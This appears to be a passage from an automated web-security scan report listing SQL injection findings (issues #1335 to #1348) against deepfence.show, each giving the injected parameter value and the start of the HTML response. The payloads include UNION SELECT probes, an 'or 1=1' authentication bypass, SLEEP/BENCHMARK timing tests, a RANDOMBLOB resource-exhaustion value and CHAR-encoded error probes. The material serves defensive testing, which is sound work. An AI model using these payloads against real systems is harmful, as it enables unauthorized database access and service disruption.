--> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1335\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# RANDOMBLOB(1000000000\n/2)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1336\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1337\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1338\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1339\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or \"1\"=\"1\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1340Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1341\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 27--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1342\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1343\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1344\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1345\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1346\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1347\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1348\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> 